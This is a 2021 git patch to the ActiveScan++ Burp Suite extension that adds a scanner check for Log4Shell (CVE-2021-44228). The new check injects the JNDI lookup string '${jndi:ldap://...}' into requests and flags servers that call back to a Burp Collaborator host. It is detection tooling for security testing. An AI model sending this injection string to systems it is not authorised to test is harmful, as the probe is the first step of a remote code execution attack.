From b485a0744140533d877ce244603502b42f9c6656 Mon Sep 17 00:00:00 2001 From: James Kettle Date: Fri, 10 Dec 2021 10:44:51 +0000 Subject: [PATCH] Detect Log4Shell --- activeScan++.py | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/activeScan++.py b/activeScan++.py index 7a46f95..665c7e4 100644 --- a/activeScan++.py +++ b/activeScan++.py @@ -31,7 +31,7 @@ except ImportError: print "Failed to load dependencies. This issue may be caused by using the unstable Jython 2.7 beta." -VERSION = "1.0.22" +VERSION = "1.0.23" FAST_MODE = False DEBUG = False callbacks = None @@ -69,6 +69,7 @@ def registerExtenderCallbacks(self, this_callbacks): callbacks.registerScannerCheck(SimpleFuzz()) callbacks.registerScannerCheck(EdgeSideInclude()) if collab_enabled: + callbacks.registerScannerCheck(Log4j()) callbacks.registerScannerCheck(Solr()) callbacks.registerScannerCheck(doStruts_2017_12611_scan()) @@ -713,6 +714,25 @@ def consolidateDuplicateIssues(self, existingIssue, newIssue): return is_same_issue(existingIssue, newIssue) +class Log4j(IScannerCheck): + def doActiveScan(self, basePair, insertionPoint): + collab = callbacks.createBurpCollaboratorClientContext() + attack = request(basePair, insertionPoint, "${jndi:ldap://"+collab.generatePayload(True)+"/a}") + interactions = collab.fetchAllCollaboratorInteractions() + if interactions: + return [CustomScanIssue(attack.getHttpService(), helpers.analyzeRequest(attack).getUrl(), [attack], + 'Log4Shell (CVE-2021-44228)', + "The application appears to be running a version of log4j vulnerable to RCE. ActiveScan++ sent a reference to an external file, and received a pingback from the server.

" + + "To investigate, use the manual collaborator client. It may be possible to escalate this vulnerability into RCE. Please refer to https://www.lunasec.io/docs/blog/log4j-zero-day/ for further information", + 'Firm', 'High')] + + def doPassiveScan(self, basePair): + return [] + + def consolidateDuplicateIssues(self, existingIssue, newIssue): + return is_same_issue(existingIssue, newIssue) + + class Solr(IScannerCheck): def doActiveScan(self, basePair, insertionPoint): collab = callbacks.createBurpCollaboratorClientContext()